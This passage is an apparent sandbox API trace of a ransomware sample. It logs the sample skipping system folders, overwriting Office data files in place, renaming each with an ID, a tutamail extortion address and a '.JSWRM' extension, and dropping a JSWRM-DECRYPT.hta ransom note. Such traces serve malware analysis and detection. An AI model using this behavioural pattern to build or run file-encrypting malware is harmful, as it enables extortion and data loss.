cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0131.464] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a210 [0131.464] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a210, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0131.464] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a210 | out: hHeap=0x1e0000) returned 1 [0131.464] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf0) returned 0x2472c8 [0131.464] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x166) returned 0x1ff448 [0131.464] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0131.464] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0131.464] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolData\\groove.net\\CommonData\\UnreadIconImagesMask.bmp" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\tooldata\\groove.net\\commondata\\unreadiconimagesmask.bmp"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolData\\groove.net\\CommonData\\UnreadIconImagesMask.bmp.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\tooldata\\groove.net\\commondata\\unreadiconimagesmask.bmp.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0131.465] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1ff448 | out: hHeap=0x1e0000) returned 1 [0131.465] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b568 | out: hHeap=0x1e0000) returned 1 [0131.465] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bad8 | out: hHeap=0x1e0000) returned 1 [0131.465] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0131.465] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0131.465] FindNextFileW (in: hFindFile=0x231f80, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x19889710, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x19889710, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x198afa29, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5a4, dwReserved0=0x60002, dwReserved1=0x2175ae, cFileName="UnreadIconImagesMask.bmp", cAlternateFileName="UNREAD~1.BMP")) returned 0 [0131.466] FindClose (in: hFindFile=0x231f80 | out: hFindFile=0x231f80) returned 1 [0131.466] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ae28 | out: hHeap=0x1e0000) returned 1 [0131.466] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235ea8 | out: hHeap=0x1e0000) returned 1 [0131.466] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235f60 | out: hHeap=0x1e0000) returned 1 [0131.466] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1983d259, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x198634b7, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x198634b7, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x210d28, cFileName="Computers", cAlternateFileName="COMPUT~1")) returned 1 [0131.466] lstrcmpiW (lpString1="Computers", lpString2=".") returned 1 [0131.466] lstrcmpiW (lpString1="Computers", lpString2="..") returned 1 [0131.466] lstrcmpiW (lpString1="Computers", lpString2="...") returned 1 [0131.466] lstrcmpiW (lpString1="Computers", lpString2="windows") returned -1 [0131.466] lstrcmpiW (lpString1="Computers", lpString2="recovery") returned -1 [0131.466] lstrcmpiW (lpString1="Computers", lpString2="perflogs") returned -1 [0131.466] lstrcmpiW (lpString1="Computers", lpString2="documents and settings") returned -1 [0131.466] lstrcmpiW (lpString1="Computers", lpString2="$RECYCLE.BIN") returned 1 [0131.466] lstrcmpiW (lpString1="Computers", lpString2="system volume information") returned -1 [0131.466] lstrcmpiW (lpString1="Computers", lpString2="msocache") returned -1 [0131.466] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236970 [0131.466] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236240 | out: hHeap=0x1e0000) returned 1 [0131.466] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2362f8 [0131.466] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bb50 [0131.466] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f5f8 [0131.466] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bb50 | out: hHeap=0x1e0000) returned 1 [0131.466] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolData\\groove.net\\Computers\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\tooldata\\groove.net\\computers\\jswrm-decrypt.hta")) returned 0xffffffff [0131.466] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f5f8 | out: hHeap=0x1e0000) returned 1 [0131.466] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0131.466] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b0bc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0131.467] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0131.467] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x27b348 [0131.467] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0131.467] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x27d118 [0131.467] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x27b348 | out: hHeap=0x1e0000) returned 1 [0131.467] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b2b8 [0131.467] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23ede0 [0131.467] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b2b8 | out: hHeap=0x1e0000) returned 1 [0131.467] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolData\\groove.net\\Computers\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\tooldata\\groove.net\\computers\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0131.470] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.470] WriteFile (in: hFile=0x338, lpBuffer=0x345b1d0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b19c, lpOverlapped=0x0 | out: lpBuffer=0x345b1d0*, lpNumberOfBytesWritten=0x345b19c*=0x230c, lpOverlapped=0x0) returned 1 [0131.471] CloseHandle (hObject=0x338) returned 1 [0131.471] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ede0 | out: hHeap=0x1e0000) returned 1 [0131.471] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x27d118 | out: hHeap=0x1e0000) returned 1 [0131.471] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2362f8 | out: hHeap=0x1e0000) returned 1 [0131.471] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236748 [0131.471] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0131.471] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235ea8 [0131.471] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bb50 [0131.471] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f030 [0131.471] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bb50 | out: hHeap=0x1e0000) returned 1 [0131.471] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolData\\groove.net\\Computers\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\tooldata\\groove.net\\computers\\jswrm-decrypt.hta")) returned 0x20 [0131.471] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f030 | out: hHeap=0x1e0000) returned 1 [0131.471] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235ea8 | out: hHeap=0x1e0000) returned 1 [0131.471] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b6a0 [0131.471] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolData\\groove.net\\Computers\\*.*", lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1983d259, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x198634b7, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x4504a81f, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x2175ae, cFileName=".", cAlternateFileName="")) returned 0x231ac0 [0131.471] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0131.471] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1983d259, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x198634b7, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x4504a81f, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x2175ae, cFileName="..", cAlternateFileName="")) returned 1 [0131.471] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0131.471] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0131.471] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x198634b7, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x198634b7, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x198634b7, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xe1b, dwReserved0=0x60002, dwReserved1=0x2175ae, cFileName="computericon.jpg", cAlternateFileName="COMPUT~1.JPG")) returned 1 [0131.471] lstrcmpiW (lpString1="computericon.jpg", lpString2=".") returned 1 [0131.472] lstrcmpiW (lpString1="computericon.jpg", lpString2="..") returned 1 [0131.472] lstrcmpiW (lpString1="computericon.jpg", lpString2="...") returned 1 [0131.472] lstrcmpiW (lpString1="computericon.jpg", lpString2="windows") returned -1 [0131.472] lstrcmpiW (lpString1="computericon.jpg", lpString2="recovery") returned -1 [0131.472] lstrcmpiW (lpString1="computericon.jpg", lpString2="perflogs") returned -1 [0131.472] lstrcmpiW (lpString1="computericon.jpg", lpString2="documents and settings") returned -1 [0131.472] lstrcmpiW (lpString1="computericon.jpg", lpString2="$RECYCLE.BIN") returned 1 [0131.472] lstrcmpiW (lpString1="computericon.jpg", lpString2="system volume information") returned -1 [0131.472] lstrcmpiW (lpString1="computericon.jpg", lpString2="msocache") returned -1 [0131.472] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0131.472] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="computericon.jpg", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0131.472] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0131.472] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="computericon.jpg", cchWideChar=16, lpMultiByteStr=0x241268, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="computericon.jpg", lpUsedDefaultChar=0x0) returned 16 [0131.472] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0131.472] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0131.472] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="computericon.jpg", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0131.472] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0131.472] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="computericon.jpg", cchWideChar=16, lpMultiByteStr=0x241380, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="computericon.jpg", lpUsedDefaultChar=0x0) returned 16 [0131.472] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0131.472] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22f0d8 [0131.472] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b6a0 | out: hHeap=0x1e0000) returned 1 [0131.472] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0131.472] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345dec4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0131.472] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22ea18 [0131.472] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolData\\groove.net\\Computers\\computericon.jpg" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\tooldata\\groove.net\\computers\\computericon.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x264 [0131.473] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x345de58 | out: lpFileSize=0x345de58*=3611) returned 1 [0131.473] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.473] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe10) returned 0x27b348 [0131.473] ReadFile (in: hFile=0x264, lpBuffer=0x27b348, nNumberOfBytesToRead=0xe10, lpNumberOfBytesRead=0x345de64, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345de64*=0xe10, lpOverlapped=0x0) returned 1 [0131.475] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.475] WriteFile (in: hFile=0x264, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0xe10, lpNumberOfBytesWritten=0x345de60, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345de60*=0xe10, lpOverlapped=0x0) returned 1 [0131.475] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x27b348 | out: hHeap=0x1e0000) returned 1 [0131.475] CloseHandle (hObject=0x264) returned 1 [0131.475] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22e358 [0131.475] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0131.475] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0131.475] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0131.475] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0131.475] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0131.475] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0131.475] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a210 [0131.475] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a210, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0131.476] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a210 | out: hHeap=0x1e0000) returned 1 [0131.476] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b1c8 [0131.476] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0131.476] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b1c8 | out: hHeap=0x1e0000) returned 1 [0131.476] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0131.476] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolData\\groove.net\\Computers\\computericon.jpg" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\tooldata\\groove.net\\computers\\computericon.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolData\\groove.net\\Computers\\computericon.jpg.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\tooldata\\groove.net\\computers\\computericon.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0131.477] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0131.477] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22e358 | out: hHeap=0x1e0000) returned 1 [0131.477] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ea18 | out: hHeap=0x1e0000) returned 1 [0131.477] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0131.477] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0131.477] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x198634b7, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x198634b7, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x198634b7, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x838, dwReserved0=0x60002, dwReserved1=0x2175ae, cFileName="computericonMask.bmp", cAlternateFileName="COMPUT~1.BMP")) returned 1 [0131.477] lstrcmpiW (lpString1="computericonMask.bmp", lpString2=".") returned 1 [0131.477] lstrcmpiW (lpString1="computericonMask.bmp", lpString2="..") returned 1 [0131.477] lstrcmpiW (lpString1="computericonMask.bmp", lpString2="...") returned 1 [0131.477] lstrcmpiW (lpString1="computericonMask.bmp", lpString2="windows") returned -1 [0131.477] lstrcmpiW (lpString1="computericonMask.bmp", lpString2="recovery") returned -1 [0131.477] lstrcmpiW (lpString1="computericonMask.bmp", lpString2="perflogs") returned -1 [0131.477] lstrcmpiW (lpString1="computericonMask.bmp", lpString2="documents and settings") returned -1 [0131.477] lstrcmpiW (lpString1="computericonMask.bmp", lpString2="$RECYCLE.BIN") returned 1 [0131.477] lstrcmpiW (lpString1="computericonMask.bmp", lpString2="system volume information") returned -1 [0131.477] lstrcmpiW (lpString1="computericonMask.bmp", lpString2="msocache") returned -1 [0131.477] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0131.477] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="computericonMask.bmp", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0131.477] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0131.477] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="computericonMask.bmp", cchWideChar=20, lpMultiByteStr=0x241330, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="computericonMask.bmp", lpUsedDefaultChar=0x0) returned 20 [0131.477] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0131.477] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0131.477] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="computericonMask.bmp", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0131.477] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0131.477] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="computericonMask.bmp", cchWideChar=20, lpMultiByteStr=0x240ef8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="computericonMask.bmp", lpUsedDefaultChar=0x0) returned 20 [0131.477] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0131.477] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b820 [0131.477] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22f0d8 | out: hHeap=0x1e0000) returned 1 [0131.477] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0131.477] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345dec4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0131.477] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b2b0 [0131.477] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolData\\groove.net\\Computers\\computericonMask.bmp" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\tooldata\\groove.net\\computers\\computericonmask.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x264 [0131.478] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x345de58 | out: lpFileSize=0x345de58*=2104) returned 1 [0131.478] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.478] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x830) returned 0x20c6c0 [0131.478] ReadFile (in: hFile=0x264, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x830, lpNumberOfBytesRead=0x345de64, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345de64*=0x830, lpOverlapped=0x0) returned 1 [0131.480] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.480] WriteFile (in: hFile=0x264, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x830, lpNumberOfBytesWritten=0x345de60, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345de60*=0x830, lpOverlapped=0x0) returned 1 [0131.480] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20c6c0 | out: hHeap=0x1e0000) returned 1 [0131.480] CloseHandle (hObject=0x264) returned 1 [0131.480] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b568 [0131.480] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0131.480] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0131.480] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0131.480] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0131.480] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0131.480] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0131.480] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0131.480] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0131.480] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0131.480] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22bad8 [0131.480] 